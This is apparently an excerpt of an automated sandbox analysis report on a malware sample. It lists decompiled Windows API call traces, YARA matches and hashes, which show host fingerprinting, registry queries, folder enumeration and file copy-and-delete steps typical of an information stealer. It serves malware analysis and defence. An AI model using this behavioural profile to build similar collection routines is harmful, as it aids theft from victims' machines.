                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                              • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6BB8C947
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BB8C969
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6BB8C9A9
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BB8C9C8
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BB8C9E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4191843772-0
                                                                                                                                                                                                                              • Opcode ID: 1913bd832a513897b61a94942414d620c5b8178e6bde618e4fcae4f10840bb66
                                                                                                                                                                                                                              • Instruction ID: 8f7dce4b3096b45be2fd4383db35bd8fef5c1ac3af8c89315243adb45f9f85fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1913bd832a513897b61a94942414d620c5b8178e6bde618e4fcae4f10840bb66
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC21F972641258ABDB159E78EC84BBE73ADEB46700F50025EF906A7680DB759C00C7E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F0988), ref: 004129EB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                              • String ID: L0A
                                                                                                                                                                                                                              • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                              • Opcode ID: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
                                                                                                                                                                                                                              • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                              • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,042F26F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,042F7480,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                              • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,042F2960,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,042F6AF0,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                              • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                              • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(042F07D8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F7200,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(042F07D8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                              • API String ID: 2929475105-3463377506
                                                                                                                                                                                                                              • Opcode ID: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
                                                                                                                                                                                                                              • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                              • API String ID: 544645111-3492212131
                                                                                                                                                                                                                              • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                              • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                              • Opcode ID: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
                                                                                                                                                                                                                              • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,042F2960,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,042F6AF0,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,042F74A0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042F0998), ref: 0041438F
                                                                                                                                                                                                                                • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,042F74A0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042F0998), ref: 00414396
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 004144C0
                                                                                                                                                                                                                                • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 00414542
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,042F7500,00000000,?,0041D76C,00000000,?,00000000,00000000,?,042F6A00,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,042F26F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,042F7480,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
